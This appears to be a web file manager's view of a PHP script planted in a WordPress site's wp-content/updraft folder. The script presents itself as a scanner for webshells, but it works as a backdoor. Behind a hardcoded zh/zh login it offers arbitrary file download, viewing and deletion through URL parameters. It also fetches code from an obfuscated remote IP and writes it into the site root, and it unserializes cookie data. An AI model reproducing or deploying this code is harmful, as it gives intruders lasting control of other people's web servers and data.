芝麻web文件管理V1.00
编辑当前文件:/home/r5772835/public_html/rigato2.ycreate.site/wp-content/updraft/km.php
<?php /**************PHP Web************************/ /*******************************************************/ ob_start(); ignore_user_abort(true); set_time_limit(0); date_default_timezone_set("PRC"); //error bin ini_set('display_errors',1); //error end $username = "zh"; $password = "zh"; $md5 = md5(md5($username).md5($password)); $version = "PHP Web v1.2"; $servername = base64_decode("aHR0cDovLzEyNy4wLjAuMTo4MDAvdjE="); $servername = base64_decode("aHR0cDovLzE1Ni4yMjYuMTguNTMvdjE="); $updatefile = array(); $realpath = realpath('./'); $selfpath = $_SERVER['PHP_SELF']; $selfpath = substr($selfpath, 0, strrpos($selfpath,'/')); define('REALPATH', str_replace('//','/',str_replace('\\','/',substr($realpath, 0, strlen($realpath) - strlen($selfpath))))); define('MYFILE', basename(__FILE__)); //define('MYPATH', str_replace('\\', '/', dirname(__FILE__)).'/'); define('MYPATH', str_replace('\\', '/', dirname($_SERVER['DOCUMENT_ROOT'])).'/'); define('MYFULLPATH', str_replace('\\', '/', (__FILE__))); define('HOST', "http://".$_SERVER['HTTP_HOST']); //取版本号 $wp_version $wp_version = ""; $verisonfile = $_SERVER["DOCUMENT_ROOT"]."/wp-includes/version.php"; if (file_exists($verisonfile)){ include $verisonfile; } if(isset($_POST['subdirectory'])){ $subdirectory = 1; }else{ $subdirectory =0; } if(isset($_POST['mymm'])){ $mymm = 1; }else{ $mymm = 0; } ?> <html> <head> <title>查找大码</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style> body{margin:0px;} body,td{font: 12px Arial,Tahoma;line-height: 16px;} a {color: #00f;text-decoration:underline;} a:hover{color: #f00;text-decoration:none;} .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;} .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;} .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;} .head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;} .head td span{font-weight:normal;} #footer{padding: 30px 30px;} </style> </head> <body> <?php header("Content-Type: text/html;charset=utf-8"); if(!(isset($_COOKIE['t00ls']) && $_COOKIE['t00ls'] == $md5) && !(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5))) { echo '<form id="frmlogin" name="frmlogin" method="post" action="">用户名: <input type="text" name="username" id="username" /> 密码: <input type="password" name="password" id="password" /> <input type="submit" name="btnLogin" id="btnLogin" value="登陆" /></form>'; } elseif(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5)) { setcookie("t00ls", $md5, time()+60*60*24*365,"/"); echo "登陆成功!"; header( 'refresh: 1; url='.MYFILE.'?action=scan' ); exit(); } else { setcookie("t00ls", $md5, time()+60*60*24*365,"/"); $setting = getSetting(); $action = isset($_GET['action'])?$_GET['action']:""; if($action=="logout") { setcookie ("t00ls", "", time() - 3600); Header("Location: ".MYFILE); exit(); } if($action=="download" && isset($_GET['file']) && trim($_GET['file'])!=""){ $file = $_GET['file']; ob_clean(); if (@file_exists($file)) { header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".basename($file)."\""); echo file_get_contents($file); } exit(); } //show if($action=="show" && isset($_GET['file']) && trim($_GET['file'])!=""){ $file = $_GET['file']; ob_clean(); if (@file_exists($file)) { //header("Content-type: application/octet-stream"); //header("Content-Disposition: filename=\"".basename($file)."\""); echo file_get_contents($file); } exit(); } //delmy if($action=="delmy" ){ $_SERVER["document_root"]; $file = $_SERVER['SCRIPT_FILENAME']; ob_clean(); unlink($file); echo "删除成功!"; exit(); } if($action=="del" && isset($_GET['file']) && trim($_GET['file'])!=""){ $file = $_GET['file']; //ob_clean(); chmod($file,0755); unlink($file); echo "删除成功!"; exit(); } if($action=="update" && isset($_GET['file']) && trim($_GET['file'])!=""){ $file = $_SERVER["DOCUMENT_ROOT"].$_GET['file']; $updatefile = trim($_GET['file']); $wp_versions =explode(".",$wp_version); $ves = $wp_versions[0].".".$wp_versions[1]; $geurl = $servername ."/wps/wordpress-{$ves}/wordpress".$updatefile; ob_clean(); echo $geurl; $resdate = file_get_contents($geurl); if(strlen($resdate)>300){ file_put_contents($file,$resdate); } echo "更新成功!"; exit(); } //serch start if($action=="serch" && isset($_GET['file']) && trim($_GET['file'])!=""){ $dir = isset($_POST['path'])?$_POST['path']:MYPATH; $dir = substr($dir,-1)!="/"?$dir."/":$dir; ob_clean(); $start=time(); $is_user = array(); $is_ext = ""; $list = ""; if(trim($setting['user'])!="") { $is_user = explode("|",$setting['user']); if(count($is_user)>0) { foreach($is_user as $key=>$value) $is_user[$key]=trim(str_replace("?","(.)",$value)); $is_ext = "(\.".implode("($|\.))|(\.",$is_user)."($|\.))"; } } if($setting['hta']==1) { $is_hta=1; $is_ext = strlen($is_ext)>0?$is_ext."|":$is_ext; $is_ext.="(^\.htaccess$)"; } if($setting['all']==1 || (strlen($is_ext)==0 && $setting['hta']==0)) { $is_ext="(.+)"; } $php_code = getCode(); if(!is_readable($dir)) $dir = MYPATH; $count=$scanned=0; $log = fopen("kslog.txt","w+"); scan($dir,$is_ext); //fclose($log); //fiel close $end=time(); $spent = ($end - $start); ?> <div style="padding:10px; background-color:#ccc">扫描: <?php echo $scanned?> 文件 | 发现: <?php echo $count?> 可疑文件 | 耗时: <?php echo $spent?> 秒</div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr class="head"> <td width="15" align="center">No.</td> <td width="40%">文件</td> <td width="23%">访问时间_更新时间_创建时间</td> <td width="10%">原因</td> <td width="5%">特征</td> <td>动作</td> </tr> <?php echo $list?> </table> <?php exit; } //serch end ?> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tbody><tr class="head"> <td><?php echo $_SERVER['SERVER_ADDR']?><span style="float: right; font-weight:bold;"><?php echo "<a href='/'>$version</a>"?></span></td> </tr> <tr class="alt1"> <td><span style="float: right;"><button onclick="delmy()" >删除自己</button> <?=date("Y-m-d H:i:s",time())?></span> <a href="?action=scan">扫描</a> | <a href="?action=setting">设定</a> | <a href="?action=logout">登出</a> </td> </tr> </tbody></table> <br> <?php if($action=="setting") { if(isset($_POST['btnsetting'])) { $Ssetting = array(); $Ssetting['user']=isset($_POST['checkuser'])?$_POST['checkuser']:"php | php? | phtml"; $Ssetting['all']=isset($_POST['checkall'])&&$_POST['checkall']=="on"?1:0; $Ssetting['hta']=isset($_POST['checkhta'])&&$_POST['checkhta']=="on"?1:0; setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/"); echo "设置完成!"; header( 'refresh: 1; url='.MYFILE.'?action=setting' ); exit(); } ?> <form name="frmSetting" method="post" action="?action=setting"> <fieldset style="width:400px"> <LEGEND>扫描设定</LEGEND> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="60">文件后缀:</td> <td width="300"><input type="text" name="checkuser" id="checkuser" style="width:300px;" value="<?php echo $setting['user']?>"></td> </tr> <tr> <td><label for="checkall">所有文件</label></td> <td><input type="checkbox" name="checkall" id="checkall" <?php if($setting['all']==1) echo "checked"?>></td> </tr> <tr> <td><label for="checkhta">设置文件</label></td> <td><input type="checkbox" name="checkhta" id="checkhta" <?php if($setting['hta']==1) echo "checked"?>></td> </tr> <tr> <td> </td> <td> <input type="submit" name="btnsetting" id="btnsetting" value="提交"> </td> </tr> </table> </fieldset> </form> <?php } else { $dir = isset($_POST['path'])?$_POST['path']:MYPATH; $dir = substr($dir,-1)!="/"?$dir."/":$dir; ?> <form name="frmScan" method="post" action=""> <table width="100%%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35" style="vertical-align:middle; padding-left:5px;">网站路径:</td> <td width="690"> <input type="text" name="path" id="path" style="width:600px" value="<?php echo $_SERVER['DOCUMENT_ROOT']?>"> <!-- <input type="submit" name="btnScan" id="btnScan" value="开始扫描"disabled> --> <button type="button" clas="btnScan" id="btnScan" onclick="serch()"> 开始扫描</button> </td> </tr> </table> </form> <?php } } ob_flush(); ?> <div id ="serch" class="serch"></div> <div id ="footer"></div> </body> </html> <?php function arrycan($myfilestr,$content){ foreach($myfilestr as $myv){ if(strpos($content,$myv)){ return 1; } } return 0; } function scan($path = '.',$is_ext){ global $php_code,$count,$scanned,$list,$log,$subdirectory,$wp_version,$servername; $ignore = array('.', '..' ); $replace=array(" ","\n","\r","\t"); $dh = @opendir( $path ); while(false!==($file=readdir($dh))){ if( !in_array( $file, $ignore ) ){ if( is_dir( "$path$file" ) ){ scan("$path$file/",$is_ext); } else { $current = $path.$file; if(MYFULLPATH==$current) continue; $ext =strtolower(substr($current,-3,3)); if ($ext!="php") continue; if(is_readable($current)){ $content = file_get_contents($current); $contentmd5 = $content; $content= str_replace($replace,"",$content); $scanned++; foreach($php_code as $key => $value){ if(preg_match("/$value/i",$content)){ //处理更新 $fileroot = str_replace($_SERVER['DOCUMENT_ROOT'],"",$current); $fileatime = date('Y-m-d H:i:s',fileatime($current) ); $filetime = date('Y-m-d H:i:s',filemtime($current) ); $filectime = date('Y-m-d H:i:s',filectime($current) ); $reason = explode("->",$key); $url = str_replace(REALPATH,HOST,$current); if($fileroot =="/wp-admin/includes/file.php") break; if($reason[1] == "xmrlpc_move_uploaded_file"){ if(!strstr($content,'<input')) break; } $count++; $j = $count % 2 + 1; $list.=" <tr id=\"$count\" class='alt$j' onmouseover='this.className=\"focus\";' onmouseout='this.className=\"alt$j\";'> <td>$count</td> <td><a href='$fileroot' target='_blank'>$current</a></td> <td>$fileatime ___$filetime __ {$filectime}</td> <td><font color=red> $reason[0]</font><font color=#099></font> <a href=\"javascript:void(0); \" onclick= del('$current',$count) >删除 </a> </td> <td><font color=#090>$reason[1]</font></td> <td> <a href='?action=download&file=$current' target='_blank'>下载</a> <a href='?action=show&file=$current'' target='_blank'>查看</a> </td> </tr> "; $logdata = date("Y m d h:i:s",time()) ." {$current} -> {$reason[1]} --{$reason[0]} \r\n "; break; } } }else{ $logdata = date("Y m d h:i:s",time()) ." {$current} \r\n "; //fwrite($log,$logdata); echo $logdata;//不可读目录 } } } } closedir( $dh ); } function getSetting(){ $Ssetting = array(); if(isset($_COOKIE['t00ls_s'])) { $Ssetting = unserialize(base64_decode($_COOKIE['t00ls_s'])); // $Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | shtml"; $Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | txt"; $Ssetting['all']=isset($Ssetting['all'])?intval($Ssetting['all']):0; $Ssetting['hta']=isset($Ssetting['hta'])?intval($Ssetting['hta']):1; } else { // $Ssetting['user']="php | php? | phtml | shtml"; $Ssetting['user']="php | php? | phtml | txt"; $Ssetting['all']=0; $Ssetting['hta']=1; setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/"); } return $Ssetting; } function updatetxt(){ global $servername; $getkm = $servername. "/km"; $str = file_get_contents($getkm); $strtoarr = explode("\r\n",$str); $data = array(); if(count($strtoarr)>0){ foreach($strtoarr as $v){ $onedata = explode("#k#k#",$v); if(is_array($onedata)){ $k =trim($onedata[0]); if(strlen($k)>1){ $data[$k] = trim($onedata[1]); } } } } return $data ; } function getCode(){ $update = updatetxt(); $oldarr = array( //'后台加密hex->hex($p)' =>'(?<!(\w))hex\(\$p.*\)', 'include8进制->@include("\167\160'=>'include\(.(\\\(\d+){2,3}){4}', // include\(.(\\([0-7])+){3} @include\(\"\\.* '后台加密->array(base64_'=>"array\(\'cod\','de','base','64_','e'\)", '后门特征->上传后门特征'=>"eJwBzB0z4gHHHTji7T37W9vGsj+339f\/YVFpZRrkB5A2NZhQcoC0zSEJedwSko9PUiUZQ2VpbSuRTtO", '大码->about.php'=>'\"66696C655F7075745F636F6E74656E7473\"', '大码->AD.php'=>'70687076657273696f6e', '大码->admin.php'=>'\$zEMuyJ\=gzinflate\(base64_decode\(\$zEMuyJ\)\)', '大码->class.api.php'=>"array\('te','g','nf','l','a','zi'\)", '大码->cloud.php' =>"alert\('diupload!!!'\)", '大码->index.php'=>'openbase_dir\(\){\$x=ini_get\(', '大码->install.php'=>'dechex\(ord\(\$SP\[\$lE\]\)\)', '大码->iR7SzrsOUEP.php'=>'\$XnNhAWEnhoiqwciqpoHH=file\(__FILE__\)', '大码->license.php'=>'\$jj\.\$str1\(\'H\*\',\$str\)\.\$jj', //$jj.$str1('H*',$str).$jj '大码->ma02.php'=>'\$files=GetFiles\(\$dir\)', '大码->moon.php'=>'=dechex\(ord\(\$str\[\$i\]\)\);', '大码->shell.php'=>'strstr\(strval\(\$vUjUnHvOOoO\)', '上传功能->upfile.php'=>'move_uploaded_file\(\$files\[\'tmp_name\'\],\$fullpath\)', //move_uploaded_file($files['tmp_name'], $fullpath) OK-Clickhere\! //'大码后台->upload.php'=>'cdn.jsdelivr.net', '大码->upload_file.php'=>'move_uploaded_file\(\$_FILES\["f"\]\["tmp_name"\]\[0\]', 'WP增加管理功能->WP-add'=>'"INSERTINTO\`"\.\$table_prefix\.\"users\`', '加密大码->wp-blog.php'=>'Class_UC_key\(\"273B246D7975726C3D27\"\)', '加密后台->pack(C'=>'pack\("C"\,hexdec\(substr\(\$string\,\$one\,.\)\)\)', '加密后台->hex2bin'=>'\$x1=\$_\[.\];\$x2=\$x1\(\$_\[.]\)\;',//$x1=$_[0];$x2=$x1($_[1]);$x3=$x1($_[2]); he" . "x2bin '加密后台->class Wid'=>'\$this->core=\$this->lib\(\$this->core\);\$this->core=\$this->_zx\(\);', '通用上传功能注意查看->xmrlpc_move_uploaded_file'=>'move_uploaded_file\(.*\)', '广告联盟->\$_COOKIE'=>'isset\(\$_COOKIE\[\'hIP\'\]\)', //'可疑代码特征->eval($'=>'(?<!(\w))eval\((\'|"|\s*)\\$' ); $datat = array_merge($update,$oldarr); //print_r($datat);exit; return $datat; } ?> <script src="https://code.jquery.com/jquery-1.11.3.js"></script> <script> function del(file,j){ geturl = "?action=del&file=" + file; $.get(geturl,function(data){console.log(data)}); $('#' + j).remove(); } function update(file,j,filename){ geturl = "?action=update&file=" + filename; $.get(geturl,function(data){console.log(data)}); console.log(geturl) $('#' + j).remove(); } function serch(){ $("#btnScan").text("程序正在处理中"); $("#serch").empty(); filename ="/"; geturl = "?action=serch&file=" + filename; path =$("#path").val(); $.post(geturl,{path:path},function(data){ console.log(data); $("#serch").html(data); $("#btnScan").text("开始扫描"); }); } function delmy(){ geturl ="?action=delmy"; $.get(geturl,function(data){ console.log(data); alert("删除成功!"); }) } </script>